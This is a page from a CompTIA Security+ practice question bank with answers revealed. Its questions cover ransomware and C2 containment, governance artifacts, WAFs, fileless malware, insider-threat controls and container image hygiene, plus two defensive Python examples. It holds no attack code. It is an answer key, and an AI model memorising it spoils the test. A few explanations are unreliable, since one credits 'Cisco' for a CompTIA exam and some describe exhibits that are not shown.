Security+ SY0-701 (SY0-701) — Questions 751–825

1152 questions total · 16 pages · All types, answers revealed

Page 11 of 16
751 · Multi-Select · hard

A company is evaluating a multi-tenant SaaS document platform. The security team wants to reduce the impact of another tenant’s breach and ensure employees who leave are removed from the app within minutes. Which two requirements should the team prioritize? Select two.

Select 2 answers
A. Require the provider to document logical tenant isolation and separate customer encryption keys.
B. Use a shared local administrator account for the app so offboarding is easier.
C. Allow anonymous public links as the default method for external collaboration.
D. Integrate the SaaS with the corporate IdP using federation and SCIM lifecycle automation.
E. Rely on manual quarterly cleanup tickets to disable former employees.
Answers: A, D

Logical tenant isolation helps prevent one tenant from reading or influencing another tenant’s data. Separate customer encryption keys further reduce cross-tenant risk because encrypted content is not protected by a single shared key set. Together, these requirements are useful when evaluating multi-tenant SaaS risk and selecting a provider with stronger separation controls.

Why this answer

Option A is correct because logical tenant isolation (e.g., separate databases or namespaces) and separate customer encryption keys ensure that a breach in one tenant cannot access another tenant's data, directly reducing the impact of cross-tenant attacks. This aligns with the shared responsibility model in SaaS, where the provider must enforce strong multi-tenant boundaries at the application and data layers.

Exam trap

The trap here is that candidates may confuse 'shared local admin account' (Option B) with efficient offboarding, but it actually undermines security and auditability, while the correct approach is federation with SCIM for automated lifecycle management.

752 · MCQ · medium

A file server suddenly shows many encrypted files with a new extension, and endpoint tools report that Volume Shadow Copy Service was disabled minutes earlier. A note on the desktop demands payment in cryptocurrency. What should the security team do first?

A. Pay the ransom immediately to restore access quickly.
B. Isolate the affected systems from the network and preserve evidence.
C. Reimage the server immediately without documenting the event.
D. Disable antivirus alerts so staff can work without distractions.
Answer: B

Isolation is the first priority because it helps stop the spread of ransomware and prevents additional encryption or lateral movement. Preserving evidence at the same time supports later incident response, forensics, and potential legal or insurance needs. The organization can then assess the scope, validate backups, and begin containment and recovery in a controlled way. Immediate disconnection from the network is usually more valuable than attempting remediation on a live, actively infected host.

Why this answer

Isolating the affected systems from the network and preserving evidence is the correct first step because it prevents the ransomware from spreading to other systems via SMB or other network protocols, and it preserves the forensic artifacts (e.g., the ransom note, encrypted files, and Volume Shadow Copy Service logs) needed for incident response and potential decryption. Disabling VSS is a common ransomware tactic to prevent file recovery, so immediate containment is critical before any remediation.

Exam trap

The trap here is that candidates may confuse 'immediate remediation' (e.g., reimaging) with 'first response' (containment and evidence preservation), or they may incorrectly assume paying the ransom is a viable technical solution, when in fact it is never recommended in incident response frameworks like NIST SP 800-61.

How to eliminate wrong answers

Option A is wrong because paying the ransom does not guarantee decryption (attackers may not provide the key), it funds further criminal activity, and it violates most organizational security policies and legal guidelines. Option C is wrong because reimaging the server immediately destroys all forensic evidence (e.g., memory dumps, logs, encrypted file samples) that could be used for attribution, decryption research, or legal action, and it bypasses the necessary containment step to prevent lateral movement.

753 · MCQ · hard

Based on the exhibit, which metric best shows that employees are recognizing and escalating phishing attempts more quickly?

A. Click rate, because a lower click rate is the only useful awareness metric.
B. Training completion rate, because it proves every employee attended the awareness session.
C. Median report time, because it shows how quickly users notify security after spotting a phish.
D. Number of simulation emails sent, because a larger campaign is always a better metric.
Answer: C

Median report time best demonstrates faster recognition and escalation, which reduces attacker dwell time and improves response. In the exhibit, the median time dropped from 8 minutes to 3 minutes, showing better behavior under pressure. Click rate is still useful, but quick reporting is the stronger indicator of resilience and response readiness.

Why this answer

The median report time directly measures the speed at which employees notify the security team after identifying a phishing simulation email. A decreasing median report time indicates that users are recognizing phishing attempts more quickly and escalating them, which is the key behavioral change this metric captures. Unlike click rate, which only measures failure, report time measures the positive action of reporting.

Exam trap

Cisco often tests the distinction between metrics that measure awareness (e.g., training completion) versus metrics that measure behavioral change (e.g., median report time), and candidates mistakenly choose click rate because it is a common phishing metric, but it does not capture the speed of escalation.

How to eliminate wrong answers

Option A is wrong because click rate measures the percentage of users who clicked a phishing link, which indicates failure to recognize a phish, not the speed of recognition or escalation; a lower click rate is useful but does not show how quickly users report. Option B is wrong because training completion rate only proves attendance, not whether employees learned to recognize or escalate phishing attempts; it is a proxy for exposure, not effectiveness. Option D is wrong because the number of simulation emails sent is a measure of campaign scale, not user behavior; a larger campaign does not inherently indicate faster recognition or reporting.

754 · MCQ · easy

After a workstation hardening baseline is updated, the security team wants to confirm that finance laptops actually match the new settings. Which control is the best way to verify this?

A. Run a configuration compliance scan against the updated baseline
B. Ask users whether they think their laptops are secure
C. Assume the baseline was applied because the change ticket was approved
D. Delete the old baseline so there is only one policy to reference
Answer: A

A compliance scan directly compares the endpoint settings to the approved baseline and identifies gaps quickly.

Why this answer

A configuration compliance scan compares the current settings of the finance laptops against the updated hardening baseline. This automated process checks specific registry keys, file permissions, service states, and security policy settings (e.g., via SCAP or CIS benchmarks) to verify alignment. It provides objective, measurable evidence of compliance, unlike subjective user feedback or assumptions.

Exam trap

The trap here is that candidates may confuse change management approval (Option C) with actual technical verification, overlooking the need for a direct compliance check to confirm implementation.

How to eliminate wrong answers

Option B is wrong because asking users whether they think their laptops are secure relies on subjective opinion and lacks technical verification; users cannot accurately assess registry settings, service configurations, or Group Policy objects. Option C is wrong because assuming the baseline was applied based solely on an approved change ticket ignores the possibility of failed deployments, manual overrides, or configuration drift; change management does not guarantee technical enforcement. Option D is wrong because deleting the old baseline does not verify that the new settings are actually applied; it only removes a reference point, leaving no way to measure compliance or detect deviations.

755 · MCQ · easy

A policy states that sensitive data must be encrypted, but it does not say which encryption strength to use. The security architect wants a document that lists the exact approved encryption settings for systems to follow. What document is needed?

A. A procedure, because it explains the step-by-step order for handling every file.
B. A standard, because it specifies the required technical values and configurations.
C. A guideline, because it gives suggestions that teams may choose to adopt.
D. A memo, because it is the fastest way to tell teams about a new requirement.
Answer: B

A standard is the right document when the organization needs exact, mandatory technical settings such as approved encryption strength or configuration values. The policy provides the high-level requirement, while the standard translates that requirement into measurable controls that systems and auditors can follow consistently.

Why this answer

A standard is the correct document because it mandates specific, measurable technical requirements—such as exact encryption algorithms (e.g., AES-256), key lengths, and cipher modes (e.g., GCM)—that systems must follow to comply with the policy. Unlike a policy, which states a goal (e.g., 'encrypt sensitive data'), a standard provides the enforceable configuration baseline that the security architect needs.

Exam trap

The trap here is confusing a standard with a guideline: candidates often pick 'guideline' because both documents provide technical details, but a standard is mandatory and prescriptive, while a guideline is advisory and flexible.

How to eliminate wrong answers

Option A is wrong because a procedure details the step-by-step order for performing a task (e.g., how to encrypt a file using a specific tool), not the approved encryption settings themselves. Option C is wrong because a guideline offers recommendations or best practices that teams may choose to adopt, but the security architect requires mandatory, exact values, not optional suggestions. Option D is wrong because a memo is an informal communication method, not a formal document that defines technical requirements; it lacks the authority and precision needed for enforcing encryption configurations.

756 · MCQ · hard

Based on the exhibit, which governance artifact is being described?

A. Policy, because it states broad organizational intent without requiring specific settings.
B. Standard, because it defines mandatory requirements but does not describe a step-by-step process.
C. Procedure, because it explains the exact sequence an administrator should follow to secure the device.
D. Baseline, because it defines the approved minimum configuration that systems must meet.
Answer: D

The exhibit is labeled as a minimum configuration and lists required settings that establish the approved security floor for all laptops. That is the classic purpose of a baseline. It provides a reference point for configuration consistency and drift detection, and it is often approved by security and technical owners together. The annual review cycle also fits a controlled baseline update process.

Why this answer

The exhibit describes a baseline because it specifies the approved minimum configuration settings that systems must meet, such as requiring AES-256 encryption, disabling weak protocols like SSL and TLS 1.0, and enforcing a minimum password length of 14 characters. These are mandatory security thresholds, not broad intent, step-by-step instructions, or optional standards.

Exam trap

The trap here is that candidates confuse a standard with a baseline, but a standard is a broader mandatory requirement (e.g., 'use encryption') while a baseline specifies the exact minimum acceptable configuration (e.g., 'use AES-256 with a key length of 256 bits').

How to eliminate wrong answers

Option A is wrong because a policy states broad organizational intent and high-level goals, not specific configuration settings like 'AES-256 encryption' or 'disable SSL/TLS 1.0'. Option B is wrong because a standard defines mandatory requirements but does not include the specific numeric thresholds or approved minimum values that a baseline does; the exhibit lists exact minimums (e.g., 14-character passwords), which is characteristic of a baseline. Option C is wrong because a procedure provides a step-by-step sequence of actions, whereas the exhibit only lists required configuration states without any ordered instructions.

757 · MCQ · medium

A company is placing a customer-facing web application behind a new security control. The team wants to block malicious HTTP requests such as injection attempts before they reach the application server, with minimal code changes to the app itself. Which control is the best fit?

A. Network access control (NAC) at the switch port.
B. Web application firewall (WAF) in front of the application.
C. Data loss prevention (DLP) on the email gateway.
D. Endpoint detection and response (EDR) on the web server only.
Answer: B

A WAF inspects HTTP traffic and can block common web exploits without requiring changes to the application code.

Why this answer

A web application firewall (WAF) is specifically designed to inspect and filter HTTP/HTTPS traffic at the application layer (Layer 7), blocking malicious payloads such as SQL injection and cross-site scripting (XSS) before they reach the web server. It operates without requiring changes to the application code, making it the ideal choice for this scenario.

Exam trap

The trap here is that candidates may confuse a WAF with a network firewall or NAC, thinking any 'security control' placed in front of a server can block application-layer attacks, but only a WAF operates at Layer 7 with HTTP-specific inspection capabilities.

How to eliminate wrong answers

Option A is wrong because Network Access Control (NAC) operates at Layer 2/3 to enforce access policies based on device posture or authentication at the switch port, and it cannot inspect or block application-layer HTTP attacks like injection attempts. Option C is wrong because Data Loss Prevention (DLP) on the email gateway is designed to monitor and prevent exfiltration of sensitive data in email traffic, not to filter malicious HTTP requests targeting a web application. Option D is wrong because Endpoint Detection and Response (EDR) on the web server only detects and responds to threats at the host level after they have reached the server, whereas the requirement is to block attacks before they reach the application server with minimal code changes.

758 · MCQ · easy

A customer-facing website must stay available if one of two application servers fails. Which design should the team implement?

A. A single server with a larger power supply
B. A load balancer in front of multiple application servers
C. A daily screenshot of the website
D. A more restrictive password policy
Answer: B

A load balancer can send traffic to a healthy server if one instance becomes unavailable.

Why this answer

A load balancer distributes incoming traffic across multiple application servers, providing high availability and fault tolerance. If one server fails, the load balancer automatically redirects traffic to the remaining healthy server(s), ensuring the website remains accessible. This design directly addresses the requirement for continued availability despite a single server failure.

Exam trap

The trap here is that candidates may confuse high availability with other security or operational measures, such as backups or password policies, failing to recognize that only redundant infrastructure with automatic failover can maintain uptime during a server failure.

How to eliminate wrong answers

Option A is wrong because a larger power supply only addresses power redundancy for a single server, not server-level failure; if the server itself fails, the website goes down regardless of power capacity. Option C is wrong because a daily screenshot captures a static image of the website at a point in time and does nothing to maintain live availability or handle server failures. Option D is wrong because a more restrictive password policy improves authentication security but has no impact on server redundancy or application availability.

759 · MCQ · medium

An employee reports a ransomware note on a file server. The server is still powered on, shares are still being accessed, and management wants service restored as quickly as possible. What should the incident response team do first?

A. Power off the server immediately to stop all attacker activity
B. Isolate the server from the network while keeping it powered on
C. Start restoring from backup before collecting any logs or memory data
D. Delete the ransomware note and suspicious files to reduce business disruption
Answer: B

Isolation contains spread and preserves volatile data, which supports both recovery decisions and investigation.

Why this answer

The correct first step is to isolate the server from the network while keeping it powered on. This preserves volatile evidence (e.g., memory, running processes, network connections) that is critical for forensic analysis and understanding the ransomware's entry vector. Powering off would destroy this data, and restoring from backup prematurely could reintroduce the infection or miss evidence needed to prevent recurrence.

Exam trap

The trap here is that candidates often assume immediate power-off is the safest containment action, but CompTIA emphasizes preserving volatile evidence first, as powering off destroys critical forensic data that may be needed for decryption or attribution.

How to eliminate wrong answers

Option A is wrong because powering off the server immediately destroys volatile data in RAM (e.g., encryption keys, active network connections, process artifacts) that are essential for forensic analysis and may be needed to decrypt files or identify the ransomware variant. Option C is wrong because restoring from backup before collecting logs or memory data risks restoring an infected state or missing evidence that could reveal how the ransomware entered, allowing it to strike again.

760 · MCQ · medium

A security analyst receives an alert from the intrusion detection system (IDS) indicating a high volume of outbound traffic from a single internal workstation to an external IP address known to be associated with a command-and-control (C2) server. The workstation's user reports no unusual activity. Which of the following should the analyst do FIRST?

A. Disconnect the workstation from the network.
B. Run a full antivirus scan on the workstation.
C. Review firewall logs to see if the traffic is being blocked.
D. Inform the user to shut down the workstation.
Answer: A

This is correct because immediate containment is critical. Isolating the workstation stops potential data exfiltration and prevents the attacker from using the system to move laterally or execute further commands.

Why this answer

The IDS alert indicates a high volume of outbound traffic to a known C2 server, which strongly suggests the workstation is compromised and communicating with an attacker. Disconnecting the workstation from the network (Option A) is the immediate containment step to prevent data exfiltration and further C2 communication, following the NIST incident response framework's containment phase. This action stops the threat at the network layer without waiting for additional analysis.

Exam trap

CompTIA often tests the principle that containment (disconnecting the network) must precede eradication (antivirus scan) or analysis (log review), and the trap here is that candidates choose a less disruptive step like running a scan or checking logs, thinking they need more data before acting.

How to eliminate wrong answers

Option B is wrong because running a full antivirus scan takes time and may not detect advanced or custom malware, and it does not stop ongoing C2 traffic; containment must occur first. Option C is wrong because reviewing firewall logs to see if traffic is blocked is a passive analysis step that delays containment; the IDS already detected the traffic, so the priority is to stop it, not verify blocking. Option D is wrong because informing the user to shut down the workstation relies on the user's action, which introduces delay and potential error, and shutdown may destroy volatile evidence (e.g., memory artifacts) needed for forensic analysis.

761 · MCQ · medium

During triage, you see a legitimate browser process spawning powershell.exe with an encoded command, followed by an outbound connection to a newly registered domain. No new executable is written to disk. Which malware characteristic best fits this behavior?

A. Fileless malware that relies on scripting and memory-resident execution.
B. A macro virus that only runs when a document is opened.
C. A boot sector virus that persists by altering startup code.
D. A logic bomb that activates only when a specific date or event is reached.
Answer: A

This pattern matches malware that abuses trusted processes and scripts instead of dropping a traditional executable file. Browser-to-PowerShell chaining, encoded commands, and memory-resident activity are common indicators. The lack of a new file on disk does not mean the endpoint is clean; it often means the attacker is trying to evade traditional file-based detection.

Why this answer

Option A is correct because the described behavior—a legitimate browser process spawning PowerShell with an encoded command, executing in memory without writing a new executable to disk, and making an outbound connection to a newly registered domain—is the classic hallmark of fileless malware. Fileless malware leverages built-in scripting engines (like PowerShell) and runs entirely in memory, avoiding traditional disk-based detection by antivirus and forensic tools.

Exam trap

The trap here is that candidates may assume any malware that doesn't write a file is a 'macro virus' or 'boot sector virus,' but the key differentiator is the use of a scripting engine (PowerShell) spawned by a legitimate process, combined with memory-only execution and an immediate C2 connection, which uniquely defines fileless malware.

How to eliminate wrong answers

Option B is wrong because a macro virus requires a document to be opened and typically writes a macro to the document or template, whereas the scenario involves a browser process spawning PowerShell with an encoded command and no document interaction. Option C is wrong because a boot sector virus alters the Master Boot Record (MBR) or Volume Boot Record (VBR) to persist on disk at system startup, but the scenario shows no disk write and execution is memory-resident via a scripting engine. Option D is wrong because a logic bomb triggers only when a specific condition (date, event, or user action) is met, but the scenario describes an immediate outbound connection following the PowerShell execution, with no mention of a delayed or conditional trigger.

762 · MCQ · medium

Based on the exhibit, which metric best indicates improved phishing resistance?

A. Training completion rate.
B. Number of phishing emails sent by attackers.
C. Phish report rate.
D. Total number of help desk tickets.
Answer: C

The report rate directly reflects whether employees are identifying suspicious messages and escalating them, which is a strong sign of improved phishing resistance.

Why this answer

The phish report rate measures how many users report a simulated phishing email to the security team, which directly indicates their ability to recognize and respond to phishing attempts. A higher report rate demonstrates improved security awareness and resistance because users are actively identifying threats rather than ignoring or falling for them. This metric is a key performance indicator in security awareness programs because it reflects behavioral change, not just training completion.

Exam trap

CompTIA often tests the misconception that training completion rate (Option A) is the best indicator of security awareness, but the exam emphasizes that behavioral metrics like phish report rate are more meaningful because they measure actual user response to threats.

How to eliminate wrong answers

Option A is wrong because training completion rate only measures whether users finished the training module, not whether they retained or applied the knowledge to resist phishing attacks. Option B is wrong because the number of phishing emails sent by attackers is an external threat metric that the organization cannot control and does not reflect user resistance or program effectiveness. Option D is wrong because the total number of help desk tickets is a broad metric that includes many unrelated issues (e.g., password resets, software problems) and does not specifically measure phishing resistance or user reporting behavior.

763 · Multi-Select · easy

A security manager is creating a document that requires every corporate laptop to use full-disk encryption, automatic screen locking after 10 minutes, and approved antivirus software. Which two governance artifacts best fit those requirements? Select two.

Select 2 answers
A. Policy
B. Standard
C. Procedure
D. Guideline
E. Baseline
Answers: B, E

A standard defines mandatory requirements, such as required security settings that all laptops must meet.

Why this answer

Option B (Standard) is correct because a standard defines mandatory technical configurations, such as requiring full-disk encryption (e.g., AES-256 via BitLocker or FileVault), automatic screen locking after 10 minutes, and approved antivirus software. Standards are specific, enforceable baselines that implement the broader intent of a policy, making them the appropriate artifact for these concrete security controls.

Exam trap

The trap here is confusing a policy (broad intent) with a standard (specific mandatory configuration), leading candidates to select 'Policy' when the question explicitly lists precise technical requirements that belong in a standard.

764 · MCQ · easy

A user reports that their laptop is showing frequent pop-up ads, the browser homepage keeps changing, and the system has become noticeably slower. What is the most likely immediate containment action?

A. Keep the laptop online so security tools can continue collecting data
B. Disconnect the laptop from the network and begin endpoint isolation
C. Immediately reimage the laptop before preserving any evidence
D. Ask the user to uninstall the browser and reinstall it manually
Answer: B

Network isolation stops the suspected malicious software from communicating outward or spreading while analysts investigate the device.

Why this answer

The best immediate action is to isolate the laptop from the network. The symptoms suggest malicious or unwanted software may be communicating with outside servers or affecting the browser. Isolation limits further damage, prevents possible spread, and gives responders time to inspect the system safely. This is a standard first containment step when a workstation appears compromised but is still active.

Why others are wrong: Keeping the laptop online risks continued malicious activity. Reimaging too early can destroy evidence needed for root-cause analysis. Simply reinstalling the browser may remove a symptom, but it does not address the possibility of a broader endpoint compromise.

765 · MCQ · medium

A SOC analyst receives an EDR alert showing a finance laptop creating encrypted archives and then attempting SMB connections to several internal file shares. The user is still logged in, and the business wants to stop possible spread without destroying volatile evidence. What should the analyst do first?

A. Power off the laptop immediately to stop all activity.
B. Isolate the endpoint from the network using the EDR containment feature.
C. Reimage the laptop from a gold image as soon as possible.
D. Disable the user account in Active Directory and wait for the malware to stop.
Answer: B

This cuts off the host from reaching other systems while preserving the powered-on state, which helps protect volatile evidence.

Why this answer

Option B is correct because the EDR containment feature isolates the endpoint from the network while preserving all running processes, memory, and disk state. This stops the encrypted archives from being exfiltrated via SMB and prevents lateral movement, but keeps volatile evidence (e.g., active malware processes, network connections) intact for forensic analysis.

Exam trap

The trap here is that candidates confuse 'stopping the spread' with 'destroying evidence,' and choose power-off or reimage, failing to recognize that containment in EDR is designed specifically to halt network propagation while preserving forensic data.

How to eliminate wrong answers

Option A is wrong because powering off the laptop destroys volatile evidence (e.g., memory-resident malware, active network connections, encryption keys in RAM) and may trigger anti-forensic mechanisms. Option C is wrong because reimaging wipes all data, including critical forensic artifacts like the encrypted archives, malware binaries, and registry changes, making incident response impossible. Option D is wrong because disabling the user account does not stop the malware already running on the laptop from continuing its SMB connections and encryption activity, as the process operates with the user's cached credentials or tokens.

766 · MCQ · medium

A finance clerk reports a call from a person who claimed to be from the bank's fraud department. The caller knew the employee's name, referenced a recent invoice, and asked the employee to read back a one-time MFA code to stop a supposed payment block. Which attack is most likely?

A. Vishing, because the attacker is using a voice call to manipulate the target in real time.
B. Smishing, because the attacker requested a code and mentioned a financial problem.
C. Baiting, because the caller offered to fix the payment issue for the employee.
D. Tailgating, because the attacker used a trusted identity to gain access.
Answer: A

Vishing is voice-based phishing. The attacker used a phone call, gained trust with specific details, and pressured the employee to reveal an MFA code. That real-time conversation and the request for a secret value are classic indicators of a voice social engineering attempt.

Why this answer

The attack is vishing (voice phishing) because the attacker uses a telephone call to socially engineer the target into divulging a one-time MFA code. The real-time voice interaction and the specific request for an authentication code are hallmarks of vishing, which exploits human trust rather than technical vulnerabilities.

Exam trap

The trap here is confusing the delivery method (voice vs. text) and focusing on the content (request for a code) rather than the channel, leading candidates to incorrectly choose smishing when the attack is clearly voice-based.

How to eliminate wrong answers

Option B is wrong because smishing uses SMS text messages, not voice calls; the attacker here called the clerk, so the medium is voice, not text. Option C is wrong because baiting involves offering something enticing (e.g., a free USB drive) to lure the victim into an action, not a real-time request for a code over the phone. Option D is wrong because tailgating is a physical security attack where an unauthorized person follows an authorized individual into a restricted area; this scenario involves no physical access, only a phone call.

767
Multi-Selectmedium

A company is implementing controls to protect against insider threats. Which three of the following controls are most effective for detecting and preventing data exfiltration by a malicious insider? (Choose three.)

Select 3 answers
A.Deploying Data Loss Prevention (DLP) solutions to monitor and block sensitive data leaving via email or USB
B.Implementing user behavior analytics (UBA) to flag unusual access patterns or large downloads
C.Enforcing strict role-based access controls (RBAC) with the principle of least privilege
D.Requiring all employees to use complex passwords changed every 30 days
E.Installing antivirus software on all endpoints
F.Conducting annual security awareness training for all staff
AnswersA, B, C

Why this answer

Data Loss Prevention (DLP) solutions are effective because they can inspect content in real time, blocking sensitive data from being sent via email, copied to USB, or uploaded to cloud services. User Behavior Analytics (UBA) detects anomalies such as a user downloading thousands of records at 3 AM, which is a strong indicator of malicious intent. Role-Based Access Control (RBAC) with least privilege limits the data a user can access, reducing the attack surface and making exfiltration harder even if credentials are compromised.

Exam trap

The trap here is that candidates often confuse general security controls (like password policies or antivirus) with controls specifically designed to detect or prevent data exfiltration, leading them to select options that are good security practices but irrelevant to the scenario.
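
The UBA control above is the one most candidates have never seen in code, so here is an added example (not from the question bank) of the two checks it describes: a per-user volume baseline and an off-hours rule. The events, user names and working-hours range are constructed for the example; each day is scored against the same user's other days so a single bulk download cannot hide inside its own baseline.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample file-server access events (user, ISO timestamp, bytes read).
# Made up for the example; a real feed would come from file-server audit logs or a DLP agent.
SAMPLE_EVENTS = [
    ("alice", "2024-03-04T10:15:00", 2_000_000),
    ("alice", "2024-03-05T11:02:00", 1_500_000),
    ("alice", "2024-03-06T09:48:00", 2_200_000),
    ("alice", "2024-03-07T10:30:00", 1_800_000),
    ("alice", "2024-03-08T03:05:00", 950_000_000),   # 3 AM bulk pull: the insider scenario
    ("bob",   "2024-03-04T14:00:00", 5_000_000),
    ("bob",   "2024-03-05T15:20:00", 4_800_000),
    ("bob",   "2024-03-06T13:10:00", 5_100_000),
    ("bob",   "2024-03-07T16:45:00", 4_900_000),
    ("bob",   "2024-03-08T14:30:00", 5_200_000),
]

BUSINESS_HOURS = range(7, 20)   # 07:00-19:59 local time is treated as normal (assumption)
Z_THRESHOLD = 3.0               # how far above the user's own baseline counts as anomalous
MIN_BASELINE_DAYS = 3           # don't score a user until there is some history


def daily_volumes(events):
    """Sum bytes per (user, day) so the baseline is built from whole working days."""
    totals = defaultdict(int)
    for user, ts, nbytes in events:
        totals[(user, datetime.fromisoformat(ts).date())] += nbytes
    return totals


def flag_anomalies(events, z_threshold=Z_THRESHOLD):
    """Return (user, when, reason) findings.

    Volume: each day is compared with the same user's OTHER days (leave-one-out),
    so a single huge day cannot inflate its own baseline.
    Off-hours: any access outside BUSINESS_HOURS is flagged regardless of size.
    """
    by_user = defaultdict(dict)
    for (user, day), total in daily_volumes(events).items():
        by_user[user][day] = total

    findings = []
    for user, days in by_user.items():
        for day, total in days.items():
            baseline = [v for d, v in days.items() if d != day]
            if len(baseline) < MIN_BASELINE_DAYS:
                continue
            mu, sigma = mean(baseline), pstdev(baseline) or 1.0
            z = (total - mu) / sigma
            if z > z_threshold:
                findings.append((user, day.isoformat(), f"volume z={z:.1f} vs own baseline"))

    for user, ts, _ in events:
        if datetime.fromisoformat(ts).hour not in BUSINESS_HOURS:
            findings.append((user, ts, "off-hours access"))
    return findings


if __name__ == "__main__":
    for finding in flag_anomalies(SAMPLE_EVENTS):
        print(*finding)
```

Run as-is it reports only alice's 8 March activity, once for volume and once for the 03:05 access; bob's steady 5 MB days never cross the threshold. Real UBA products add peer-group baselines and many more signals, but the leave-one-out comparison is the part that matters for the insider case.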

768
Multi-Selectmedium

A manufacturing company must keep a legacy scheduling application running for 60 days while replacement testing finishes. The application supports production orders, and the business cannot tolerate a shutdown. Which three conditions should be required before approving the temporary exception? Select three.

Select 3 answers
A.Assign a named risk owner who is authorized to accept the residual risk.
B.Set a clear expiration date and mandatory review point before renewal.
C.Implement a compensating control such as network restriction or added monitoring.
D.Rely on the vendor's promise that a better version will be available eventually.
E.Approve an unlimited waiver so operations do not need to revisit the issue.
AnswersA, B, C

Accountability matters because only an authorized business owner should accept the remaining exposure for a temporary exception.

Why this answer

Assigning a named risk owner who is authorized to accept residual risk is a fundamental requirement for any risk exception. This ensures accountability and that a specific individual with the authority to accept the potential consequences of running an unsupported system is identified. Without a designated owner, the exception lacks governance and could lead to unmanaged exposure.

Exam trap

The trap here is that candidates might think only one or two of these conditions are needed, but the SY0-701 exam expects all three—risk owner, expiration/review, and compensating controls—to be present for a valid risk exception.

769
Multi-Selecteasy

A DevOps team stores container images in a registry before deployment. Which two practices reduce the chance of deploying a risky image? Select two.

Select 2 answers
A.Scan images for known vulnerabilities before they are promoted to production.
B.Use trusted minimal base images and remove unnecessary packages.
C.Run containers as root by default to simplify troubleshooting.
D.Mount the host operating system filesystem into every container.
E.Deploy images using the latest tag without reviewing version history.
AnswersA, B

Image scanning helps identify vulnerable packages and libraries before deployment. This is a practical control because it finds known issues early in the pipeline, when they are easiest to fix.

Why this answer

Option A is correct because scanning container images for known vulnerabilities (e.g., using tools like Trivy or Clair) identifies CVEs in the OS packages or application dependencies before the image reaches production. This proactive check prevents deploying images with exploitable flaws, aligning with secure software supply chain practices. Option B is correct because using trusted minimal base images (e.g., Alpine or distroless) reduces the attack surface, and removing unnecessary packages eliminates potential vulnerabilities from unused components, following the principle of least functionality.

Exam trap

CompTIA often tests the misconception that running containers as root is acceptable for troubleshooting, but the SY0-701 exam emphasizes that containers should always run with the least privileges necessary, and the latest tag is a security anti-pattern because it breaks deterministic deployments.
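
An added example, not part of the question bank, of how a CI gate can catch the three anti-patterns this question names (untrusted base image, a floating `latest` tag, and running as root) before an image is promoted. The registry name `registry.example.internal`, the Dockerfiles and the digest value are constructed for the example; the reference grammar is simplified and does not handle `host:port` registries.

```python
import re

# Image reference grammar (simplified): name[:tag][@sha256:digest]. Registry host:port
# forms are not handled here. The corporate registry prefix is a hypothetical name.
IMAGE_RE = re.compile(
    r"^(?P<name>[a-z0-9][a-z0-9._/-]*?)"
    r"(?::(?P<tag>[\w][\w.-]{0,127}))?"
    r"(?:@(?P<digest>sha256:[0-9a-f]{64}))?$"
)
TRUSTED_PREFIXES = ("registry.example.internal/",)


def check_image_ref(ref):
    """Return policy violations for one image reference; an empty list means it passes."""
    m = IMAGE_RE.match(ref)
    if not m:
        return [f"unparseable image reference: {ref}"]
    name, tag, digest = m.group("name"), m.group("tag"), m.group("digest")
    issues = []
    if not name.startswith(TRUSTED_PREFIXES):
        issues.append("base image is not from the trusted (scanned) registry")
    if digest is None:
        if tag is None or tag == "latest":
            issues.append("floating tag (latest/untagged): the image can change between builds")
        else:
            issues.append("tag without digest pin: a tag can be re-pushed with different content")
    return issues


def check_dockerfile(text):
    """Lint a Dockerfile for the anti-patterns named in the question."""
    issues, last_user = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line.upper().startswith("FROM "):
            ref = line.split()[1]
            issues.extend(f"FROM {ref}: {why}" for why in check_image_ref(ref))
        elif line.upper().startswith("USER "):
            last_user = line.split()[1]
    if last_user in (None, "root", "0"):
        issues.append("container runs as root: add a non-root USER before the entrypoint")
    return issues


# Constructed digest placeholder (64 hex chars); a real one comes from the registry after scanning.
CONSTRUCTED_DIGEST = "sha256:" + "0123456789abcdef" * 4

WEAK_DOCKERFILE = """\
FROM nginx:latest
RUN apt-get update && apt-get install -y curl vim
COPY app /app
ENTRYPOINT ["/app"]
"""

HARDENED_DOCKERFILE = f"""\
FROM registry.example.internal/base/distroless-static:nonroot@{CONSTRUCTED_DIGEST}
COPY app /app
USER 65532
ENTRYPOINT ["/app"]
"""

if __name__ == "__main__":
    for label, df in (("weak", WEAK_DOCKERFILE), ("hardened", HARDENED_DOCKERFILE)):
        print(label, check_dockerfile(df) or "OK")
```

The weak Dockerfile produces three findings (untrusted registry, floating tag, root); the hardened one passes because the digest pin makes the deployment deterministic and the scanner's verdict applies to exactly those bytes. Vulnerability scanning itself is left to a tool such as Trivy or Clair run on the same pinned reference.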

770
MCQmedium

An email attachment from an external supplier is not blocked by signature-based AV, but the SOC wants to see whether it drops files, launches child processes, or contacts suspicious domains before delivery to users. Which control best fits?

A.Network IDS, because it passively monitors traffic for known threats.
B.Sandboxing, because it detonates the file in an isolated environment.
C.DLP, because it prevents sensitive data from leaving the organization.
D.NAC, because it controls whether a device can join the network.
AnswerB

A sandbox can safely execute the attachment and reveal malicious actions such as file drops, process spawning, and outbound callbacks.

Why this answer

Sandboxing is the correct control because it detonates the file in an isolated, virtualized environment to observe its runtime behavior, such as dropping files, spawning child processes, or making outbound connections to suspicious domains. This goes beyond signature-based AV by analyzing dynamic behavior rather than static file hashes or patterns. The SOC's goal is to assess the file's actions before delivery, which sandboxing directly addresses.

Exam trap

The trap here is that candidates confuse passive monitoring (IDS) with active behavioral analysis (sandboxing), assuming IDS can detect unknown threats by watching traffic, but IDS lacks the ability to execute and observe the file's runtime actions in an isolated environment.

How to eliminate wrong answers

Option A is wrong because Network IDS passively monitors traffic for known threat signatures but cannot detonate or analyze the behavior of an email attachment in isolation; it would only alert on network-level indicators after the file is executed. Option C is wrong because DLP (Data Loss Prevention) focuses on preventing sensitive data from leaving the organization via monitoring content in transit or at rest, not on analyzing file behavior or detecting malicious actions like dropping files or contacting domains. Option D is wrong because NAC (Network Access Control) enforces policies on device compliance and network admission, such as checking for up-to-date antivirus or patch levels, and has no capability to execute or analyze email attachments for behavioral threats.

771
MCQmedium

An EDR alert shows powershell.exe launching with an encoded command, no new executable written to disk, and a registry run key added for persistence. Outbound HTTPS traffic then begins to a rare external domain. Which type of malware behavior is most likely?

A.Worm behavior, because the malware is automatically spreading across the network.
B.Fileless attack, because the malicious activity is using legitimate tools and memory rather than a dropped payload.
C.Rootkit behavior, because the attacker is hiding from the operating system at a low level.
D.Spyware, because the malware is using HTTPS traffic to contact an external domain.
AnswerB

The alert shows encoded PowerShell, no new file on disk, and persistence through a registry run key. That pattern strongly suggests a fileless attack, where attackers abuse trusted system tools and memory-based execution to avoid traditional file detection.

